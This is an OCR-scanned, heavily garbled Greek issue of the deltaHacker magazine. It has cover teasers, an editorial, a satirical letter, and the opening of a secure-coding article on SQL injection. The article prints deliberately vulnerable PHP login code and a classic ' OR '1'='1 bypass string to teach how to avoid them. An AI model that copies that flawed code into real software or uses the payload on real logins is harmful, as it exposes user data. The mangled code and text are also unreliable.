Χριστουγεννιάτικο δωράκι 
για τους freeloaders του WiFi 


Κατακτήστε έναν Linux server 
χωρίς το Metasploit 


be 20 Каут= το web ασφαλέστερο 
γράφοντας σωστό κώδικα 


с^ Ё 


ХЭ and how you can lift it by programing like а pro 


Е κ. 


— 5: 


Lee COTES 


και οδηγίες χρήσης 


εντιτορια 


Μπουγάτσα µε ενηµέρωση 


μπροστά στην ανθρώπινη βλακεία, και οι Өғої 
ακόµα σηκώνουν τα χέρια ψηλά 


DIKA (µέρος 1 апо 2) 


κακά τα ψέμματα: η µεγαλύτερη αδυναμία των εφαρμογών 
του διαδικτύου, εἶναι οι ἴδιοι οι προγραμματιστές τους 


οηµιουργια ενος του-γκουντ-του-μπι-τρου а 
(μέρος 1 απὀ 2) 


πείτε την αλήθεια: πότε βρήκατε ελεύθερο access point 
και δεν συνδεθήκατε, έστω και για λίγο; 


(μέρος 1 апо капа) 


υπάρχει κανείς που δεν θέλει να γνωρίζει έξυπνες 
τεχνικές γύρω από τη χρήση rou Arduino 


DEDOIOV ΚΟΝΤΡΟΛ σιστεµς 
και κοιμηθεῖτε ἠσυχοι (μέρος 1 απὀ 2) 


της νύχτας τα καμώματα τα βλέπει η µέρα και γελά 


pwning a Linux server *without* the framework! 


η τυφλή προτίµηση προς ένα µόνο εργαλείο δεν εἶναι 
ό,τι καλύτερο για το ακόνισµα της σκέψης µας 


συγγραφη ασφαλούς кодка (μέρος 2 апо 2) 


ποιος φταίει όταν σου κλέβουν το σπίτι επει- 
δή ξέχασες την πόρτα ανοικτή; 


να γράψουμε ένα απλό παιχνιδάκι για 
την κονσόλα µας; 


— 924. tv-game µε ro Arduino (μέρος 2 апо 2) 


there ain't no such thing as a free lunch 
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Καλλιτεχνική Επιμέλεια Πέτρος Φιλιππίδης 


Το περιοδικό deltaHacker εἶναι συνδρομητικὀ και εκδίδεται апо την Parabing Creations 
δώδεκα φορὲς το χρόνο, στις αρχές κάθε μήνα. Н Parabing Creations ἐχει την ёбра της 
στη Μαιώτιδος 3, 55 133, Καλαμαριά. Н εκτύπωση και η βιβλιοδεσία γίνονται апо την 
ThessPrint Α.Ε. To email επικοινωνίας του περιοδικού εἶναι το talk2usQdeltahacker.gr 
και το email για τις συνδρομὲς ro subscriptions deltahacker.gr. Οι πληροφορἰες για τις 
συνδρομὲς εἶναι στο http://deltahacker.gr/subscriptions και οι παραγγελίες γίνονται апо 
TO http://deltahacker.gr/order. Όλες οι απόψεις που εκφράζονται στα άρθρα δεν εκφρά- 


ζουν anapairnra και τη γνώμη του περιοδικού. 


(*) πάμε έβδομη δόση; 
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«ρε 


«ο 


To deltaHacker είναι το μοναδικό στο χώρο 
των περιοδικών έντυπο που ασχολείται 
αποκλειστικά κι αληθινά µε τον κόσμο του ethical 
hacking, γυρίζοντας συστηματικά την πλάτη του στον 
καθωσπρεπισµό κι αδιαφορώντας παντελώς για την 
ασφάλεια της θεωρίας. 

Το deltaHacker είναι τόσο σίγουρο για τον εαυτό του 
και τόσο τίμιο κι ευθύ απέναντι στον αναγνώστη, που αντί 
να γυρνάει εδώ κι εκεί στα περίπτερα και у αγωνίζεται να 
φανεί ανάµεσα στις Σούπερ-Κατίνες KAL στα PC-so-bored, 
έρχεται κατευθείαν στο σπίτι σας - Kt έρχεται για 
να σας κατακτήσει. 


Αν είστε από εκείνουςπου δεν βλέπουν τον υπολογιστή 
τους WG άλλη µια οικιακή συσκευή και δεν αντιμετωπίζετε 
το Internet ως ένα δίκτυο που αρχίζει και τελειώνει µε 
το Facebook και xo Twitter, τότε είναι 10296 βέβαιο 
ότι θ’ αγαπήσετε το deltaHacker, καθώς κι ότι θα 


θέλετε την παρέα του και τοῦς 12 μήνες του χρόνου! 


Όλες οι πληροφορίες για όλα τα προγράμματα συνδρομών 
είναι στο 


deltahacker.gr/subscriptions 


Παραγγείλετε τώρα µία από τις συμφέρουσες συνδρομές 
από το 


deltahacker.gr/order 


deltaHacker: κάνει καλό στο μυαλό. 


© /ναι/ log/messages 


Πετάχτηκα τις προάλλες μέχρι το yoviakó μαγαζάκι να πάρω ша 
μπουγάτσα. Δε συνηθίζω να κάθομαι εκεἰ, αλλά εκείνη τη μέρα ¿kave 
κρύο και δεν µου ἄρεσε η ιδέα να τρέχω στο δρόμο, yia να φτάσω 
στο σπίτι και να φάω µια κρύα μπουγάτσα. Ἄραξα λοιπὀν с’ ἑνα τρα- 
песак κι άρχισα να χαζεύω στην τηλεόραση. Eixe θρίλερ κι εμένα 
μου αρέσουν τα τρομακτικἀ έργα. Δεν ἦταν βράδυ. Πρωί ἦταν, αλλά 
τέτοιες ὧρες та κανἆλια βρίσκονται στην τηλεοπτικἡ ζώνη του тро- 
μου. Λίγο αργότερα, βλέπετε, о πολὺ ο κόσμος θα πάει στη δουλειὰ 
του και πρέπει va εἶναι κατάλληλα προετοιµασμένος: Φοβισμένος ἡ 
αγανακτισμένος -ανάλογα µε τη συνταγἠ rou καναλιού--, алла πάνω 
απ΄ ола πεισμένος От! πρέπει να υποστεί τα πάντα. Ξέρετε, отока 
δεκτικὀς, ὁπως το θύμα σε va θρίλερ τρίτης διαλογής, τη στιγμή 
που συνειδητοποιεἰ бт! εἶναι αδύνατο να γλυτώσει апо το ξανθό Ва- 
μπίρ pe ro δολοφονικὀ λέιζερ. Χαλάστηκα. Н εκπομπή ἦταν πιο χάλια 
απ’ ògo ἀντεχα npoiviáriko. Στα θρίλερ της προκοπἠς ο δολοφόνος 
δεν υπόσχεται στα θὐματά rou Ori θα τα λυπηθεὶ, οὐτε бт! υπάρχει 
περίπτωση να σωθούν στο μέλλον. Πάντως пёра апо τα кака δελτία 
και τα кала ἡ кака θρίλερ, εγὠ καταλαβαίνω бт! η πραγματικὴ ζωὴ 
δεν ἐχει αδιέξοδα. Αδιέξοδα υπάρχουν µόνο για ra προγραμματισμµέ- 
va ρομπότ, ὀχι για τα ἑλλογα бута. Συνέχισα να τρώω την μπουγάτσα 
μου κι ἀρχισα να σκἐφτοµαι κάτι ἄσχετο... 


Για κἄποιο λόγο η τηλεόραση µου χε θυμίσει την κουβέντα nou 
gixa p’ ἑνα φιλαράκι πριν апо μερικὰ χρόνια. О φίλος µου, που λέτε, 
εἶχε τότε αγοράσει καινούργιο υπολογιστή αλλά µέσα σε λίγους uñ- 
veç εἰχαν αρχίσει τα βάσανα. Αναρωτιόταν λοιπὸν τι ἐφταιγε. Μήπως 
έπρεπε να κάνω defrag πιο συχνά; Μήπως δεν έπρεπε va εγκαταστή- 
со πολλά προγράμματα; Μήπως δεν έπρεπε va ξεπεράσω το 50%(;!) 
της χωρητικότητας του δίσκου С; 


Τέτοιες σκέψεις τον βασάνιζαν και δεν ἐλεγε να µε ακούσει. Eixe 
φτάσει να νιώθει τύψεις και ενοχὲς για το бт! ο υπολογιστής -TOV 
οποίο πρέπει να σημειώσω От! εἶχε αγοράσει µε κόπο και θυσίες- δεν 
δούλευε. Τι ανωμαλία! Ἠθελα να του δείξω τη λύση και φυσικά να тоу 


βοηθήσω, αλλά ἐπρεπε прота να rov φέρω σε επαφὴ µε την πραγματικότητα: Δεν φταις 
εσύ, παιδάκι µου. Ούτε то κἁρμα σου φταίει, οὐτε οι αμαρτίες σου. Το σύστημα φταίει! Μην 
προσπαθείς να πείσεις τον εαυτὀ σου От! εἶσαι τεμπέλης, επειδἠ δεν το ντάντεψες αρκετά. 
Δεν σου φτάνει που ἡσουν δούλος του τόσον καιρό; Ἐχεις δηλαδή και τύψεις επειδὴ δεν 
υπήρξες αρκετά δουλικὀς; Όσο κι αν προσπαθούσες, пал τα ἰδια θα σου ἐκανε! Αυτός 
βέβαια το хава του. Μα, το μηχάνημα του κύριου Παντελή -ue ro ἰδιο σύστημα- τα πάει 
πολύ καλά. Ара δεν φταίει το σύστημα, αλλά εγώ που εἰμαι λιγότερος ἀξιος апо τον κύριο 
Παντελή! 


Τον καταλάβαινα. Εἶχε μάθει va σκέφτεται πάντα εντὀὸς του... συστήματος. Eixa όμως 
άφθονη υπομονή και δεν ¿kava πἰσω. Βρε ἀνθρωπέ µου, ο κύριος Παντελής ἐχει τρομερά 
πιο ακριβὀ και πολύ πιο ισχυρὀ μηχάνημα апд το δικὀ σου. Н σύγκριση που κάνεις εἶναι 
λανθασμένη! Тора, το γιατί αυτός εἶχε την άνεση να αγοράσει ισχυρὀ μηχάνημα, ενώ εσύ 
παιδεύτηκες για να αγοράσεις το δικὀ σου, ε, αυτό εἰναι ἄλλη κουβέντα. Τα προβλήματα 
nou αντιµετωπίζεις πάντως δεν έχουν να κάνουν µε TO поду σου, алла µε το σύστημα. 


Εκείνη τη στιγμή ἄρχισα να βήχω δυνατά. Н συζήτηση που θυμήθηκα µε εἶχε anoppo- 
Φἠσει yia τα καλὰ, εἶχα εκνευριστεἰ και η unoukià που кат Васа ἐχασε για λίγο το δρόμο 
της. Εντάξει, ἐφταιγε kai η μπουγάτσα γι’ αυτὀ. Ἠταν калд η атп και εἶχα αρχίσει va Ka- 
ranivo τη δεύτερη. О εκνευρισμὸς όμως παρέμενε. Н συζήτηση nou θυμόμουν εἶχε γίνει 
την εποχἠ των Windows Millennium. Τα Windows, βέβαια, ¿xouv βελτιωθεὶ απροσδόκητα 
πολύ апо τότε - να та λέμε! Н τηλεόραση ὁμως εἶχε επαναφέρει εκείνο το διάλογο στο 
μυαλὸ µου και του εἶχε προσδώσει µια νέα διάσταση. Eixa κάνει ша σύνδεση, βλέπετε, 
ανάμεσα στο nog ἑνιωθε το φιλαράκι µου τότε και στο nog θέλουν τα κανάλια να νιώθει 
ο κόσμος σήμερα. 


Μη νομἰζετε. Δεν κάνω λανθασμένες συνδέσεις στο μυαλὀ µου - ἡ τουλάχιστον ἐτσι 
θέλω να πιστεύω. Пара rov εκνευρισμὀ µου, апо εκεϊνη την ηµέρα ¿paya αρκετὲς µπου- 
γάτσες *u£oa* στο μπουγατσατζἰδικο. Οὐτε την τηλεόραση ¿koya βἐβαια. Άλλωστε TO 
σήριαλ των δόσεων παϊἰζει πολλούς μήνες τώρα και πλέον δεν πτοούμαι. Νομίζω тора 
ἐχουν φτάσει στην 6η σαιζὀν: The one that we -HONESTLY THIS TIME- got saved the last 
minute. Аутёхо. Έχω &avaósi ἐργα nou προσβάλλουν τη νοημοσύνη µου, αλλά η µαζοχι- 
στικἠ πλευρά του εαυτού µου δεν р’ αφήνει να ra κόψω. Εδώ nou τα λέμε, βἐβαια, μπορεἰ 
και να µην εἶναι ζήτημα μαζοχισμού. Ίσως να φταίει το ότι εἶμαι -ἡ τέλος πάντων προσπα- 
Өш va yivo- δέλτα χάκερ ;) Βλέπετε, σ’ αυτή µου την προσπάθεια ἐμαθα va μελετάω то 
πρόβλημα κι ενδεχομένως rov αντἰπαλὀ µου - και κυρίως να µην то βάζω като. 


Μπορεΐ στα δελτία τους να κρύβουν ori η πραγματικἠ σωτηρἱα θα ἐρθει апо εμάς τους 
ἰδιους, µπορεί να παρουσιάζουν αναλυτικἀ τα προβλήματα και yia τη λύση τους να µας 
παραπέμπουν σε σωτἠρες апо πἐρα-μακριά, αλλά εγὠ δεν µασάω. Και δεν μασάω γιατὶ 
υπάρχει και το δικὀ µας δελτίο! Ένα δελτίο που δεἰχνει От! δεν υπάρχουν αδιέξοδα, οὐτε 
ανυπἐρβλητα εμπόδια. Ένα δελτίο που μὰς μαθαίνει να στεκόµαστε στα поба µας και va 
μην το βάζουμε като. Το δικὀ µας δελτίο αναδεικνύει την αξία *ка!* της συλλογικής npo- 
σπάθειας και φυσικά την ενθαρρύνει. Το δικὀ µας δελτίο δεν απευθύνεται σε φοβισμένους 
χρήστες αλλά σε ζωηρούς, δραστήριους κι αισιόδοξους χάκερ! Και στην τελική, ὁπως και 
να το δει каміс το δικὀ µας δελτίο *бєу* εἶναι καταθλιπτικὀ. 


A, пёра απὀ δελτίο ἐχουμε και το δικὀ µας περιοδικὀ. Και σε αντίθεση µε τα бка τους, 
το δικό µας µπορεί -και κἀνει- τη διαφορά ;) 
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Αγαπητοί µου, 


Ῥέμαν πολύ καλά, παν το αυτό επυθυμώ καν γίά εσάς. 

Καθυστέρησα να ολοκληρώσω την επιστολή оъ αυτό τον µήνα -προς μεγάλην 
ανησυχία του κυρίου Ехббтор- αλλά δεν ἡταῦ στο χέρι μου. 

Όχν, δεν ήταν бт δίστασα να υπογράφω, όπως τόσον και τόσοι στις μέρες 
μας. 

ταν то бт, συνέβησαν πολλά καν διάφορα που µε έβγαλαν олбо το πρόγραμμά 
μου. 

Tua παράδειγµα, βρέθηκα, απρόσμενα καν καταµεσής του Νοεμβρίου, στο 
Πόρτο Γερμενό. 

Eixa πάεν µαζί µε τον ανιφιό, ο οποίος, εξ ίσου απρόσµενα KAL καταµεσής 
του Νοεμβρίου, βρέθηκε στην Ελλάδα, έχοντας επιστρέφει από το Λονδίνο «би 
υπόθεσἰν του». 

Έπρεπε, βλέπετε, να ανανεώσει το διαβατήριό του. 

θα αναρωτηθείτε, βέβαια, όπως αναρωτήθηκα xv εγώ, γιατί να πρέπει να ép- 
θεν στην Ελλάδα για να το ανανεώσει; Δεν θα μπορούσε να το κάνει εχεί, στο 
Λονδίνο; Προξενείο δεν έχουµε στο Ἠνωμένο Βασίλειο; Δεν εππροσωπούμαστε ως 
χώρα; 

Έλα μον, ντε... 

Από б,ть φαίνεται δεν εκπροσωπούμαστε. H μάλλον δεν εππροσωπούμαστε 
επαρκώς. 

То οποίον µε απλά λόγια σημαίνει бт το Ελληνικό Προξενείο στο Ἠνωμένο 
Βασίλενο δεν είναν σε θέση να εξασφαλίσει στους Έλληνες Πολίτες την έγκανρη 
ανανέωση του διαβατηρίον τους. 

Ῥίναι αδύνατον. Έχουν βάλει ένα ωραίο σύστημα κλεισίματος ραντεβού µέσω 
διαδικτύον, το οποίο το µόνο που δεν σου επιτρέπει να κάνεις είναν να κλείσεις 
ραντεβού. Όλα τα άλλα στα επιτρέπει. Γνα παράδειγµα να διαβάσεις δελτία τύ- 
πον για την κουνωνία της πληροφορίας. Н να τους στείλεις μένλ (στα οποία δεν 
απαντούν). 

Πάντως να πλείσεις ραντεβού yia το διαβατήριό σου που λήγεν εἶναι αδύνα- 
τον. 

О ανιφνός εἶδε και απόειδε, καν αναγκάστηκε να ξανάρθεν στην Ελλάδα για να 
το ανανεώσει. 

Να µου πείτε, αυτό σε έκαφεΣ Εδώ γίνεται της κακομοίρας xv εσύ κόπτεσαν 
για το διαβατήριο του ανιφνού; Δεν λες και πάλιν καλά. о τυχεράκιας, που την 
ÉXEL κάνεν µε πλάγια πηδηµατάκια, καν ζεν εκεί στα Λονδίνα, ενώ εμείς ον υπό- 
λοιπον έχουµε ξεμείνεν εδώ, πολληµένον στον πάτο του καζανιού, καν σιγοβρά- 
ζουμε περιμένοντας την επταµμίευση της έκτης δόσης; 


Tv να σας πω, γνα να το λέτε κάτι θα ξέρετε. 


Σνέιλ μέιλ 


VLL 


Εγώ πάντως, κολλημένος στο παζάνν δεν νοιώθω. Гь αυτό καν μόλις κατέφτασε 
καν ολοκλήρωσε την κατάθεση των δικαιολογητικών γνα ταυτότητα καν διαβατή- 
pvo, τον πήρα και φύγαμε για Πόρτο Γερμενό. 


Πάνω που ξεκινούσε η συζήτηση για την ψήφο εμπιστοσύνης στην κυβέρνηση. 


Στο τσαν την γλυτώσαμε. Н τηλεόραση στο εξοχικό, βλέπετε, δεν λεντονργεί. 
Ἐπίσης δεν éxev οὔτε ἵντερνετ, γνατί όλον ον γείτονες έχουν επιστρέφει στην 
Αθήνα καν δεν έχουµε από ποιόν να Ἀλέφουμε Wi-Fi. Οπότε ήμασταν απομονωµέ- 
νον καν ασφαλείς. 


Είχα ξεχάσει, βέβαια, ὀτν δεν éxev πλέον ούτε γραφομηχανή (αφού την έχω 
φέρεν στην Αθήνα) καν yv αυτό, όπως είπα καν στην αρχή, καθυστέρησα να ξεκι- 
νήσω την επιστολή μον. 


Τέλος πάντων, ουδέν κακόν αμιγές καλού, γνατί µας δόθηχε έτσι η ευκαιρία 
να μιλήσουμε µε тоу ανιφνό yla διάφορα θέµατα ελληνικού xav βαλκανικού ενδι- 
αφέροντος. 


Λέω βαλκανικού γιατί μεταξύ άλλων ο αννφνός роо μίλησε yra την πυβερνοε- 
πίθεση που έκαναν κάτι αποφασισμένοι «ελληνόφυχοι» χάκερ σε «850 σκοπιανά 
σάντ». 


Н επίθεση έγινε, λέει, στις 27 Οκτωβρίου, και την έκαναν τα μέλη κάποιας 
«Greek Hacking Scene», που σχετίζονταν (αν δεν ταυτίζονται) µε τα µέλη κά- 
πονας άλλης «Ένωσης Βλληνοφύχων Μαθητών». 


Τώρα υπό κανονικές συνθήκες θα θεωρούσα το όλο θέµα φαιδρό -xi υπό μίαν 
ἔννοια συνεχίζω να το θεωρώ. Αν τους αρέσεν, αυτών των «ελληνόφυχων µαθη- 
τών», να επιτίθενταν στα σάντ των γειτόνων µας, «σκοπιανών» KAL µη, καν θεω- 
ρούν бть шо. τέτοια ενέργενα ωφελεί, ὀ,τν ον ἴδιον καταλαβαίνουν ως «Ελλάδα», 
εμένα τν λόγος µου πέφτει; 


Αλλά το πράγμα µε προβλημάτισε λίγο. Δηλαδή πράγματι υπάρχουν νέα παιδιά 
πον ασχολούνταν µε τους υπολογιστές καν το χάκυνγχ, whatever that is, καν 
νονώθουν την ανάγκη να χτυπάνε σκοπιανά σάντ για να τιμήσουν την Ελλάδα; 
Δηλαδή τα σκοπιανά σάντ τους μαράνανες 


То бт έχουμε, ὡς Ελλάδα, καταλήξει reality show και ανέκδοτο διεθνώς δεν 
τους μάρανε; To ότι η χώρα µας εἶναι νπερχρεωμένη και στα πρόθυρα της ολικής 
χρεοκοπίας, αυτό δεν τους µάρανε; То бт, τα έξοδα του κράτους παραμένουν, 
εδώ καν χρόνια, μεγαλύτερα από τα έσοδα του κράτους, αυτό δεν τους µάρανε; 
То бт, όλον πιστεύουν ακράδαντα ότι φταίνε όλοι ov υπόλοιποι, αυτό δεν τους 
μάρανε; 
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О ανιφνός δεν μπορούσε να µε δναφωτίσεν περισσότερο σχετικά µε την ταυ- 
τότητα αυτών των «ελληνόφυχων» καν έτσι το έφαξα εγώ όταν γυρίσαμε στην 
Αθήνα. 

Μαθαίνω, λοιπόν, бт, υπάρχεν πράγματι µια «Greek Hacking Scene», που 
πιστεύει ότι έχει το δικαίωμα να μιλάει (παν να χακεύει) үа την Ελλάδα καν τον 
Ελληνισμό. 


Охе, νο πρόμπλεμ. Είπαμε. Περί ορέξεως κπολοκυθόπιττα. Κι εγώ μιλάω για 
την Βόρειο Κορέα, δεν έγινε και τίποτα. 


Αλλά, ρε παιδιά, εσάς τους Βλληνόφυχους τους χάκερ εννοώ, δεν σας φαίνεταν 
λίγο ευτράπελο να κόπτεστε τόσο για την Ελλάδα, καν να µην κόπτεστε καθόλου 
yla τα ελληνικά σας; Κι εντάξει, στο σχολείο δεν τα μάθατε, πού να προλάβετε 
µε τόσο χακεριό που έχετε φορτώσει στους ώμους σας... Tnv αυτόματη διόρθωση 
του Word δεν την έχετε ακουστά; 


Δυστυχώς η γραφομηχανή της κυρίας Καίτης δεν προσφέρειν την δυνατότητα 
του copy paste, αλλιώς θα σας παρέθετα, αγαπητοί µου, ολόκληρο το κείμενο 
µε το οποίο ανελάμβαναν, καταχαρούμενα, τα Βλληνόφυχα βλαστάρια µας, την 
ευθύνη των εθνικιστικών τους δραστηριοτήτων. 


Ἑλληνόφυχον μεν, ανελλήννστου δε. 


Μιλάμε ότι τόσα πολλά μαζεμένα λάθη, ορθογραφυκά, γλωσσικά καν συνταχτυ- 
κά μαζί, έχω να δω алб τότε που μου έφερνε О ανιφιός τις εκθέσεις των συμμα- 
θητών του στο Γυμνάσιο. 

Προσπαθούσε, βλέπετε, να μου αποδείξεν ότν η ενασχόλησή του µε τα Πόκε- 
роу, то Playstation, και τους υπολογιστάς δεν είχε αρνητική επίδραση στις 
σχολικές του επιδόσεις. 

Τότε δεν µε είχε πείσει. Tov είχα κατηγορήσειν ευθέως бт, έβαζε τους φίλους 
του να κάνουν λάθη επίτηδες YLA να φανεί καλύτερος о ἰδιος. Είχε τσαντιστεί 
πολύ καν εκανε боо βδομάδες να µου μιλήσει. Νομίζω бт, ακόµα δεν µε έχεν συγ- 
χωρήσεν. Απλά. το έχεν ξεχάσει. 

Με το δίκιο του, βέβαια, Ὑνατί µε αυτά που διαβάζω στην ιστοσελίδα των 
ελληνόφυχων έχω μετανιώσει που τον αμφισβήτησα, και τείνω να τον πιστέφω 
αναδρομικά. 

Καταλήγω μάλιστα στο συμπέρασμα оти ον LOLOL εκείνον συμμαθητές του έχουν 
πλέον συρρεύσει σύσσωμον στην Greek Eacking Scene. Προφανώς δεν έχουν τε- 
λενώσεν ακόµα το σχολείο. 

H μάλλον ὀχν σύσσωμον. Ον μισοί. Γνατί ον άλλον μισοί έχουν πιάσει, «ЛО ὀ,τι 
φαίνεται, δουλειά στο Υπουργείο Εξωτερικών παν ασχολούνταν µε την σχεδίαση 
Χαν την υποστήριξη των διαδικτυακών συστηµάτων κλεισίματος ραντεβού που 
χρησιμοποιούν τα Ελληνικά Προξενεία στο εξωτερικό. 


Ехостос στο είδος τον, που λέει παν о Λουμίδης. Н, γνα να το πω µε τα λὀ- 
για του Σίλερ: Μπροστά στην ανθρώπινη βλακεία, xv ον θεοί ακόµα σηκώνουν τα 
χέρια φηλά. 

Ειδικά όταν διαβάζουν (ov θεοί) στις χακεµένες σκοπιανές σελίδες για «το 
αυτονόητο του πολιτισμού που δημιουργήσαμε και δναρρέεν φυσικά алб την 
γλώσσα.» 

«Avappéev», μάλιστα. Tv νοµίζατε; Έτσι απλά} Μπρίχια κολλάγαµε τόσα χρόνια 
στο σχολείο; 

А, καν μιλώντας για σχολείο, να µην ξεχάσω να σας ευχηθώ καλές γιορτές! 
(Γκουγλλ. үт!) 


Σας ασπάζοµαν, 


θείος Ακάκιος 


У“НА@КЕК 


Πώς πρέπει va γράφει κώδικα ένας web 
developer προκειμένου v? αναπτύσσει ασφαλείς 


εφαρμογές; [σελ. 12 ἃ 74] \ 


to BackTrack και τι μπορούν να πάθουν όσοι το 


Πώς στήνεται ένα fake wireless access point µε 
χρησιμοποιούν; [σελ. 22 ἃ 92] οὐ 


Ξεκινάτε τώρα µε το Arduino αλλά δεν έχετε 
µεγάλη σχέση µε τα ηλεκτρονικά; θέλετε 
προχωρημένα tips και συμβουλές από έμπειρους 
χρήστες που θα σας κάνουν να ξεχωρίσετε; 
[σελ. 34] 


Πόσο εύκολα μπορείτε να πάρετε πρόσβαση σ’ 
έναν Linux server; Προσοχή: Н χρήση του 
Metasploit απαγορεύεται![σελ. 62] 
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bu Thiseas 


ПОО σαι σσ πο ση 


Κακά τα ψέματα. Н μεγαλύτερη αδυναμία των 
І εφαρμογών του διαδικτύου εἶναι οι ἴδιοι οι I 
ῇ προγραμματιστὲἑς τους! Σε αυτούς οφεἰλονται όλα ra 
καλά και όλα τα кака. Εµεἰς, επειδή εἴμαστε ευχάριστοι 
τύποι, προσπερνάµε та καλὰ και εστιάζουµε στα кака! Ё 
i Mn φοβάστε, δεν το κάνουμε με διάθεση γκρίνιας. Το П 
κάνουμε για να εξετάσουμε όλα αυτά τα «кака» και µε 
| την ευκαιρία να μάθουμε μερικούς βασικούς κανόνες | 
για την ελαχιστοποίηση τους! 


T 
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Πλέον, οι μεγαλύτερες αδυναμίες στο software δεν βρίσκονται στο λει- 
τουργικὸ σύστημα (Linux, BSD, Windows, Mac OS к.а.) οὐτε στους web 
server (IIS, Apache, k.à.). Οι αδυναμίες εμφανίζονται πολύ πιο συχνὰ στις 
απλὲς εφαρμογές client. Δηλαδή στις εφαρμογές που προορίζονται για 
τον τελικὀ χρήστη. Τέτοιες εφαρμογές αποτελούν τα γνωστά Συστήματα 
Διαχείρισης Περιεχομένου (CMS, апо το Content Management System), 
αλλά και πολλὲς άλλες που εκτελούνται στους διάφορους server. 


Συχνὰ οι προγραμματιστές, eire апо ἄγνοια των βασικὠν αρχών ασφάἀλει- 
ας eire απὀ βιασύνη -αφού πάντα τρέχουν να προλάβουν τα deadline-, 
δεν προσέχουν ιδιαίτερα rov κὠδικα που γράφουν. Αυτό έχει σαν ano- 
тёЛЕсра ο κὠδικας να µην εἶναι ασφαλἠς και να περιἐχει κενὰ ἡ, όπως 
συνηθίζουμε να λέμε, τρύπες. Ουσιαστικά πρὀκειται για αδυναμίες nou 
θα μπορούσε να εκμεταλλευτεἰ κάποιος για να αποκτήσει πρόσβαση σε 
δεδοµένα nou кауоміка δεν θα έπρεπε (προσωπικἁ στοιχεία χρηστών, 
email, οικονοµμικἁ στοιχεία κ.ο.κ.) Αρκετἐς φορές μάλιστα, εκµεταλλευό- 
μενος τέτοιες αδυναμἰες μπορεἰ κανεὶς να αποκτήσει πρόσβαση ακόµη και 
στον ἰδιο TOV server, µε ὁ,τι αυτό συνεπάγεται! 


Εμεἰὶς θα εστιάσουµε στο πὠς προκύπτουν αλλά και στο πῶς εξαλεἰ- 
φονται! οι αδυναμίες που θεωρούμε бт! εμφανίζονται πιο συχνὰ και 
εἶναι апо αρκετά ἑως пара πολύ επικἰνδυνες. Συγκεκριµένα, θα aoyo- 
ληθούμε µε τα κενὰ ασφαλείας που επιτρέπουν το πολύ γνωστὸ SQL 
Injection (http://en.wikipedia.org/wiki/SQL injection), το επἰσης διάση- 
ро Cross Site Scripting ἡ απλά XSS (http://en.wikipedia.org/wiki/Cross- 
site scripting) αλλά και το πολύ novnpó Session Hijacking (http:// 
en.wikipedia.org/wiki/Session hijacking). Με auró το τελευταίο θα 
ασχοληθούμε στο δεύτερο μέρος αυτού του άρθρου, το οποίο ξεκινά апо 
τη σελίδα 74 του deltaHacker nou кратат στα χέρια σας. 

Ta πειράματά µας θα γίνουν χρησιμοποιώντας τον παρακάτω εξοπλισμό: 
e РНР 5.2.9-2 και MySQL 5.1.3 σε Apache Server 2.2.11 

e — ASP.Net 2.03, SQL Server 2005+, IIS 6+ 

e Web Browsers: Internet Explorer 9, Mozilla Firefox 8.0 


Όπως βλέπετε, χρησιμοποιούμε τόσο PHP (77%) ὁσο και το αντίπαλο 
δέος ASP.Net (22%), ὥστε να καλύψουμε σχεδὸν το 100% rov developer 
(http://w3techs.com/technologies/overview/programming language/all). 


SQL Injection και PHP-MySQL 


Ката τη διάρκεια ενὸς ελέγχου ασφάλειας εἶναι пара πολύ συχνό φαι- 
νόμενο να ερχόμαστε αντιμέτωποι µε va κομμάτι κὠδικα PHP σαν το 
ακόλουθο: 


// Σύνδεση µε την βάση δεδοµένων 


$link = mysql connect('HOST', 'user', ραςς') OR die('Database 
Error"); 


$db selected = mysql select db('dbi', $link); 
//Πάρε Χρήστη και password από то URL 
= $ GET["user"]; 


assword - $ GET["password"]; 


Κατά το δυνατόν... 
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// Ἐλεγχος av ο χρήστης υπάρχει στην βάση. 


$query = "SELECT * FROM ajv users WHERE usr nick-'$user' AND usn 
pass-'$password"; 


$result - mysql query($query); 
$nrows = mysql num rows($result); 
If ($nrows == @){ 

die("AavOaouéva Στοιχεία!"); 
} 


E, λοιπὀν, αυτὸς o κὠδικας εἶναι ευάλωτος σε SQL Injection! Ξέρετε γιατί; 
Διότι δεν ελέγχει τα περιεχόμενα των μεταβλητών $user και $password, 
πριν τα προσθέσει στη µεταβλητή $query. Όπως βλέπετε, οι μεταβλητές 
user kai password προέρχονται апо το URL?. Επομένως, προέρχονται anó 
TOV τελικὀ χρήστη. О χρυσὸς κανόνας ασφάλειας κὠδικα λέει: "Οτιδήπο- 
τε µπορεί va προέλθει апо τον τελικὀ χρήστη, εἶναι ката паса πιθανότη- 
τα κακόβουλο”. Με λίγα λόγια: "Ὅλοι εἶναι ἐνοχοι, μέχρι αποδεἰξεως του 
εναντίου”! Σας θυμίζει кат! αυτό; Χμ, τέλος πάντων... 


Έστω бт! το πρὀγραμμά µας βρίσκεται στο www.deltahacker.gr/safe.php. 
Για να λειτουργήσει σωστά θα πρέπει ο χρήστης να δώσει στο URL το 
εξής: 

www.deltahacker.gr/Safe.php?user-admin&password-mypass 


Οι μεταβλητές $user και $password θα ¿xouv αντίστοιχα τις τιμὲς admin 
και mypass. Αυτὲς οι τιµές θα εισαχθούν στη μεταβλητή $query και στη 
συνέχεια θα εκτελεστεί η σχετικἠ εντολἠ SQL, στη βάση δεδομένων. 
Μέχρι εδὠ κανένα πρόβλημα. Αν δεν βρεθεὶ ο χρήστης θα διακοπεί το 
πρόγραμμα, µε το μήνυμα "Wrong Credentials". Προσέξτε τι θα συμβεἰ 
όµως αν ο χρήστης δώσει 


www.deltahacker.gr/Safe.php?user-admin&password-' OR '1-1 


Εδὠ τα πράγματα περιπλέἐκονται λιγάκι! Αν κἀνει кат! τέτοιο ο χρήστης, n 
εντολἠ SQL nou θα εκτελεστεἰ στη βάση δεδομένων θα εἶναι κάπως £rot: 


SELECT * FROM ajv users WHERE usr_nick='admin' AND usr pass-" OR 
q-1 
Αυτἠ η εντολἠ θα επιστρέφει *návra* uia ἡ περισσότερες єүүрафёс̧? anó 
τον πίνακα, καθὼς η συνθήκη `1=1' επαληθεύεται πάντα. Ως αποτέλεσµα, 
η μεταβλητή $nrows δεν θα εἶναι µηδενικἠ και το πρὀγραμμα θα νομίζει 
ὁτι εφόσον βρήκε εγγραφές στον πίνακα των χρηστῶν, ο χρήστης εἶναι 
νόμιμος! Πρὀκειται yia ша κλασικἠ περίπτωση SQL Injection. 


Αναρωτιέστε NWG μπορούμε να προστατέψουμε ro πρὀγραμμα µας апо 
μια τέτοια επίθεση; Н απάντηση εἶναι αρκετά απλή: Πρέπει να povri- 
coupe για τον “кадарісро” όλων των μεταβλητών που ορίζει ο χρήστης 
